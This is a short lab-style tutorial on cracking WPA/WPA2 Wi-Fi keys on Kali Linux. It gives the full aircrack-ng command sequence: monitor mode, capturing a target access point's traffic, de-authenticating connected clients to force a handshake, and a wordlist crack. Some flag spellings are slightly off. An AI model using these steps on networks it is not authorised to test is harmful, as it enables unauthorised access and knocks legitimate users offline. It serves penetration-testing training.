Cracking WPA / WPA2
WPA
--> Wifi Protected Access
--> Uses TKIP (Temporal Key Integrity Protocol)
WPA2
--> Wifi Protected Access 2
--> Uses CCMP (Counter mode with Cipher block Chaining Message authentication code protocol) encryption
--> Uses RADIUS (Remote Authentication Dial-In User Service Server) to manage client authentication
Deliverable:
Lab Set up
Attacker’s System: Kali Linux
Target : Access Point or Router with WPA / WPA2 security
In Kali Linux --> Terminal
1. WPA or WPA2 cannot be cracked directly. For cracking this, we need to have a wordlist. Wordlist is the file that contains number of passwords. This file can be downloaded from internet or it can be created by doing social engineering or using some tools.
2. To put wlan0 on monitor mode
~# airmon-ng start wlan0
Here, wlan0 --> wireless interface
3. To check available access points
~# airodump-ng mon0
Here, mon0 --> interface for monitor mode
Note down BSSID, Channel number, etc.
4. To capture all the traffic of target access point
~# airodump-ng -c [channel number] --bssid [MAC address of access point] -w [filename] mon0
Here, -c --> channel
[channel number] --> channel number used by access point
--bssid --> Basic Service Set Identification (MAC address of router)
-w --> write to file
[filename] --> name of the file to capture the traffic (capture file)
mon0 --> interface for monitor mode
5. Now to get one valid handshake, we will de-authenticate the authenticated clients
~# aireplay-ng -ignore-negative-one -deauth 1 -e [ESSID of access point] -c [MAC address of one of the connected client devices] mon0
Here, --ignore-negative-one à this is for safety
1 --> count for de-authentication
-e --> ESSID (name of the router or access point)
-c --> client device connected
mon0 --> interface for monitor mode
--deauth --> de-authenticate all systems for once, so as they reconnect and we will get a valid handshake
6. Cracking WPA / WPA2 using wordlist
~# aircrack-ng -w [wordlist file] [capturefile-01.cap]
Here, -w --> wordlist